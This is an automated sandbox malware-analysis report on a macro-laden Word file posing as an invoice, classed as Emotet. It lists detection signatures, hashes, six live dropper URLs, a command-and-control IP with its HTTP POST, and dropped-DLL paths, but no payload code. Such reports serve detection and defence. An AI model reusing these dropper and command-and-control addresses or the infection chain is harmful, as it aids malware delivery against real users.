Analysis Report Invoice 6682363.doc

Overview

General Information

Sample Name: Invoice 6682363.doc
Analysis ID: 343627
MD5: 2f788f4b380f7a0976e1992ef800d38e
SHA1: b210ad5140fbd4d8a1c8d36cc253f3dbe874d248
SHA256: 71952c503a38dbbefa7069548e7466de0fef1f5d95d5eade8abcdf5fb62037c7

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/ Avira URL Cloud: Label: malware
Source: http://transal.eu/netgear-wifi-qzvv4/1j7XZ/ Avira URL Cloud: Label: malware
Source: http://relatedgrouptest.com/OurTime/culeTFa3v/ Avira URL Cloud: Label: malware
Source: https://www.schmuckfedern.info/reference/0HlBBg8/ Avira URL Cloud: Label: malware
Source: http://e-wdesign.eu/wood-stove-x7iww/R1SMs1v/ Avira URL Cloud: Label: malware
Source: http://ofert-al.com/wp-content/t9hVViBde/ Avira URL Cloud: Label: malware
Source: https://www.schmuckfedern.info/reference/0HlBBg8/P Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/ Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll Metadefender: Detection: 45% Perma Link
Source: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: Invoice 6682363.doc Virustotal: Detection: 52% Perma Link
Source: Invoice 6682363.doc Metadefender: Detection: 43% Perma Link
Source: Invoice 6682363.doc ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdbx source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2102635935.000000001B460000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: micronews.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 93.119.104.27:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 93.119.104.27:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49169 -> 190.55.186.229:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in memory: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/!http://ofert-al.com/wp-content/t9hVViBde/!http://transal.eu/netgear-wifi-qzvv4/1j7XZ/!http://e-wdesign.eu/wood-stove-x7iww/R1SMs1v/!http://relatedgrouptest.com/OurTime/culeTFa3v/!https://www.schmuckfedern.info/reference/0HlBBg8/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /crankshaft-pulley-i5aio/Tlp/ HTTP/1.1Host: micronews.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/t9hVViBde/ HTTP/1.1Host: ofert-al.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 190.55.186.229 190.55.186.229
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TelecentroSAAR TelecentroSAAR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/ HTTP/1.1DNT: 0Referer: 190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/Content-Type: multipart/form-data; boundary=-----------DlOKA6XxDmYUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 6452Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EA89377-30AB-4901-9D2A-3CE504568F55}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /crankshaft-pulley-i5aio/Tlp/ HTTP/1.1Host: micronews.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/t9hVViBde/ HTTP/1.1Host: ofert-al.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: micronews.eu
Source: unknown HTTP traffic detected: POST /zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/ HTTP/1.1DNT: 0Referer: 190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/Content-Type: multipart/form-data; boundary=-----------DlOKA6XxDmYUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 6452Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Jan 2021 07:21:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://micronews.eu/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 63 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 42 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 0d 0a Data Ascii: c2<!doctype html><html lang="en-US" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found &#8211; My Blog</title>
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wood-stove-x7iww/R1SMs1v/
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/style.css?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/css/dist/block-library/theme.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://ofert-al.com
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://ofert-al.com/wp-content/t9hVViBde/
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://relatedgrouptest.com/OurTime/culeTFa3v/
Source: powershell.exe, 00000005.00000002.2094837855.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2118008797.0000000002790000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://transal.eu/netgear-wifi-qzvv4/1j7XZ/
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2094837855.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2118008797.0000000002790000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 0000000A.00000002.2138437202.0000000001D80000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/2021/01/24/hello-world/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/2021/01/24/hello-world/#comment-1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/comments/feed/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/feed/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/wp-json/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://wordpress.org/
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: https://www.schmuckfedern.info/reference/0HlBBg8/
Source: powershell.exe, 00000005.00000002.2096314239.0000000002CF4000.00000004.00000001.sdmp String found in binary or memory: https://www.schmuckfedern.info/reference/0HlBBg8/P

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000007.00000002.2108297042.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2176998214.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2163049071.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2163022289.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2207154366.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194263784.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2127194669.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2165761420.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2203773462.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2343620375.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2214139159.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117125447.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2152468849.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2343633692.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2345772809.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2104940723.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2203786691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2219092978.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2172234783.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2129920680.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151842869.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2183013093.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2139440408.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2118447591.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193360956.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2138274232.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2138258236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2104991832.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2127180650.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2186208381.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193376705.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117147382.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2213889778.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2183027063.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151824711.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2172223948.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.380000.1.unpack, type: UNPACKEDPE
